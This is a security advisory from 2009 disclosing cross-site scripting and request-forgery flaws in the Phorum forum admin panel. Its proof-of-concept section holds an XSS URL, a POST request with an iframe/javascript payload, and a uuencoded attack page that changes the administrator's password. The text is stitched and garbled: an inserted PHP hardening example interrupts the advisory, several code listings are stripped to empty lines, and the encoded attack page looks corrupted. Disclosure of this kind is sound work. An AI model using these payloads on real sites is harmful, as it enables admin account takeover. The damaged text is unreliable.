#=cicatriz =#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#

#=Phorum < 5.2.10 Cross-Site Scripting/Request Forgery=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

#=Advisory & Vulnerability Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Title: Phorum < 5.2.10 Cross-Site Scripting/Request Forgery
Advisory ID: VUDO-2009-1504
Advisory URL: http://research.voodoo-labs.org/advisories/4
Date found: 10-04-2009
Vendors contacted: Phorum
Class: Multiple Vulnerabilities
Remotely Exploitable: Yes
Locally Exploitable: No
Exploit/PoC Available: Yes
Policy: Full Disclosure Policy (RFPolicy) v2.0

#=Tested & Vulnerable packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[+] Phorum 5.2.10
[+] Phorum 5.2-dev

#=Solutions and Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Phorum has released fixes for the Cross-Site Scripting vulnerabilities [1]. No fix for the CSRF issues had been released at the time of publication (see the Reporting Timeline).

#=Technical Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Phorum [2] suffers from a series of Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) vulnerabilities, through the admin panel and the "file uploading" section (via an uploaded XML file; this vector only works when the administrator browses with Mozilla Firefox and the uploaded file is a crafted XUL document).
Some other vulnerabilities:

[*] Cross-Site Scripting (XSS):

The simplest XSS is trivial to trigger; the flaw sits in the file "include/admin/banlist.php" (XXX marks the vulnerable spot in each listing):

+++include/admin/banlist.php @@ 88:104
 88 if($_GET["curr"] && $_GET["delete"]){
 89
 90 ?>
 91
 92
 93     Are you sure you want to delete this entry?
 94     " method="post">
 95 XXX
 96
 97
 98
 99
100
101
102
---include/admin/banlist.php

+++versioncheck.php @@ 80:83
 80 XXX
 81 New Phorum version available!
 82
 83
---versioncheck.php

There is another XSS in "include/admin/users.php", exploitable only through a POST request, on these lines:

+++include/admin/users.php @@ 87:93
 87 //check for a valid email
 88 if (!empty($_POST["email"])) {
 89     include('./include/email_functions.php');
 90     $valid_email = phorum_valid_email($_POST["email"]);
 91     if ($valid_email !== true) XXX
 92         $error = "The email \"$_POST[email]\" is not valid!";
 93 }
---include/admin/users.php

Line 82 of the same file is vulnerable to the same attack.

users.php has one more vulnerable spot, reachable through the HTTP Referer header or the $_POST['referrer'] parameter: the value is stored unescaped and later written into a hidden form field.

+++include/admin/users.php @@ 52:59
 52 if (isset($_POST['referrer'])) { XXX
 53     $referrer = $_POST['referrer'];
 54     unset($_POST['referrer']);
 55 } elseif (isset($_SERVER['HTTP_REFERER'])) { XXX
 56     $referrer = $_SERVER['HTTP_REFERER'];
 57 } else {
 58     $rererrer = "{$PHORUM["admin_http_path"]}?module=users";
 59 }
---include/admin/users.php

+++include/admin/users.php @@ 659:661
659 XXX
660 $frm->hidden("referrer", $referrer);
661
---include/admin/users.php

These can be fixed by passing the values through htmlspecialchars() or htmlentities() (or another output-encoding function) before they are echoed into the page.

[*] Cross-Site Request Forgery (CSRF):

All forms in the admin panel are vulnerable to CSRF: there is no security token with which the application can check that the administrator actually intended the action. Without such a token an attacker can create a new user with admin rights, or change the administrator's password and other personal data. Actions triggered by a GET request can also be forged with a plain bbcode [img] tag: when the administrator views a post whose [img] tag points at a specially crafted URL, the action (deleting a topic, for example) is executed. A more dangerous variant leads to JavaScript execution. [3] Other vulnerabilities were found in this application.
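The two fixes this advisory points at, output encoding for the reflected values and a per-session token checked on every state-changing admin request, shown together in working PHP. This is an added example written for this page, not Phorum's own code: the function names, the confirmation-form markup and the session key are assumptions; the parameter names (curr, email, referrer) and the payloads follow the advisory's proof of concept.

```php
<?php
// Added example for this advisory, not Phorum's own code. It combines the two
// fixes the advisory calls for: HTML-escaping request data at the point of
// output (the banlist.php / users.php XSS) and a session-bound token on every
// admin form, checked before any state change (the CSRF finding). Function
// names, the session key and the form markup are illustrative; parameter
// names (curr, email, referrer) mirror the advisory's proof of concept.
declare(strict_types=1);

const CSRF_SESSION_KEY = 'phorum_admin_csrf';   // assumed name

/** Escape for an HTML text node or a quoted attribute value. */
function h(string $s): string
{
    // ENT_QUOTES covers both quote styles; the charset must match the page's.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Session token, created on first use (random_bytes() needs PHP >= 7.0). */
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

/**
 * Accept a state-changing request only if it is a POST carrying the session's
 * token, compared in constant time. A GET never passes, so a URL smuggled into
 * a bbcode [img] tag cannot delete a topic or change a password.
 */
function csrf_request_ok(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

/** Referrer: keep it only if it points into the admin panel, then escape it. */
function safe_referrer(array $post, array $server, string $admin_http_path): string
{
    $candidate = $post['referrer'] ?? ($server['HTTP_REFERER'] ?? '');
    if (!is_string($candidate) || strpos($candidate, $admin_http_path) !== 0) {
        $candidate = $admin_http_path . '?module=users';
    }
    return h($candidate);
}

/**
 * Hardened version of the banlist.php delete confirmation: $_GET["curr"] is
 * escaped (the original echoed it verbatim) and the form carries the token.
 */
function confirm_delete_form(array $get, array &$session): string
{
    return '<form action="admin.php" method="post">' . "\n"
         . '  Are you sure you want to delete this entry?' . "\n"
         . '  <input type="hidden" name="module" value="banlist" />' . "\n"
         . '  <input type="hidden" name="curr" value="' . h($get['curr'] ?? '') . '" />' . "\n"
         . '  <input type="hidden" name="csrf_token" value="' . h(csrf_token($session)) . '" />' . "\n"
         . '  <input type="submit" name="confirm" value="Yes" />' . "\n"
         . '</form>';
}

/** Hardened users.php error: the submitted address is escaped before it is echoed. */
function invalid_email_message(array $post): string
{
    return 'The email "' . h($post['email'] ?? '') . '" is not valid!';
}

// ---- Constructed walk-through (inputs made up for this example) ----------
$session = [];                                            // stands in for $_SESSION
$get     = ['curr' => '1"><script>alert(1)</script>'];
$post    = ['email' => '<iframe/src="javascript:alert(\'voodoo\');">'];
$admin   = 'http://www.victim.com/phorum-5.2.10/admin.php';

// Both payloads come back as inert text: no attribute is closed, no tag opens.
assert(strpos(confirm_delete_form($get, $session), '<script>') === false);
assert(strpos(invalid_email_message($post), '<iframe') === false);

// A referrer that does not point into the admin panel is replaced, then escaped.
assert(safe_referrer(['referrer' => 'javascript:alert(1)'], [], $admin) === h($admin . '?module=users'));

// The advisory's attack.html posts a password change from another origin; it
// cannot read the victim's session token, so the request is rejected.
$forged = ['password1' => 'pwned', 'password2' => 'pwned'];
assert(csrf_request_ok('POST', $forged, $session) === false);

// A forged GET, e.g. [img]http://victim/admin.php?module=...&delete=1[/img],
// is rejected even if the token somehow leaked into the URL.
assert(csrf_request_ok('GET', ['csrf_token' => csrf_token($session)], $session) === false);

// The legitimate submission from the rendered form carries the token.
assert(csrf_request_ok('POST', $forged + ['csrf_token' => csrf_token($session)], $session) === true);

echo confirm_delete_form($get, $session), "\n", invalid_email_message($post), "\n";
```

Two design points: the token is compared with hash_equals() so response timing cannot be used to guess it, and the check is on the request method as well as the token, because refusing to act on GET is what closes the [img] vector independently of any token. Escaping happens at the echo, not on input, so the values stay intact in the database and in the hidden fields and every output context is covered by the same one-line rule.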
(WHK)

#=Proof of Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[*] Cross-Site Scripting (XSS):

+++
http://localhost/phorum-5.2.10/admin.php?module=banlist&curr=1">", location="http://www.victim.com/phorum-5.2.10/versioncheck.php";
---

+++
POST /phorum-5.2.10/admin.php HTTP/1.1

module=users&referrer=http%3A%2F%2Fwww.victim.com%2Fphorum-5.2.10%2Fadmin.php%3Fmodule%3Dusers&addUser=1&username=xss&real_name=xss&email=%3Ciframe%2Fsrc%3D%22javascript%3Aalert%28%27voodoo%27%29%3B%22%3E&password1=xss&password2=xss&admin=0
---

[*] Cross-Site Request Forgery (CSRF):

Other CSRF proof-of-concept exploits can be found at:

[*] http://research.voodoo-labs.org/code/exploits/phorum/5.2.10/

If the administrator views this specially crafted HTML page, his password is changed to a string chosen by the attacker. (uuencoded)

+++
begin 644 attack.html
M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,3`@(F5D:71U7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)R969E7!E/2)H:61D96XB/@H)"3QI;G!U="!N M86UE/2)P87-S=V]R9#(B('9A;'5E/2)P=VYE9"(@='EP93TB:&ED9&5N(CX* M"0D\=&5X=&%R96$@#MH96EG:'0Z,'!X.V)O'1A#MH M96EG:'0Z,'!X.V)O#MH96EG:'0Z,'!X.V)O#LB/CPO=&5X=&%R96$^/"]T9#X*"0D\6QE/2)W M:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB<&%R96YT M7VED(B`^"@D)"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE8W1E M9"(^+2U.;VYE+2T\+V]P=&EO;CX*"0D\+W-E;&5C=#X*"0D\6QE/2)W:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB M86-T:79E(B`^"@D)"3QO<'1I;VX@=F%L=64](C`B/DYO/"]O<'1I;VX^"@D) M"3QO<'1I;VX@=F%L=64](C$B('-E;&5C=&5D/2)S96QE8W1E9"(^665S/"]O M<'1I;VX^"@D)/"]S96QE8W0^"@D)/'-E;&5C="!S='EL93TB=VED=&@Z,'!X M.VAE:6=H=#HP<'@[8F]R9&5R.C!P>#LB(&YA;64](G1E;7!L871E(B`^"@D) M"3QO<'1I;VX@=F%L=64](F5M97)A;&0B('-E;&5C=&5D/2)S96QE8W1E9"(^ M4&AO#MH96EG:'0Z,'!X.V)O M#4P,"D[/"]S8W)I<'0^ 2"CPO8F]D>3X*/"]H=&UL/@H*
`
end
---
#=Reporting Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[*] 10-04-2009: Bugs discovered.
[*] 10-04-2009: Voodoo contacted the vendor (advisory draft included).
[*] 13-04-2009: The vendor released fixes for the Cross-Site Scripting vulnerabilities.
[*] 15-04-2009: Advisory VUDO-2009-1504 published.

#=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[1] http://trac.phorum.org/changeset/4009
[2] http://www.phorum.org/
[3] http://foro.elhacker.net/nivel_web/multiples_fallas_en_phorum_5210-t248300.0.html

#=Wed 15 Apr 2009 ART=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#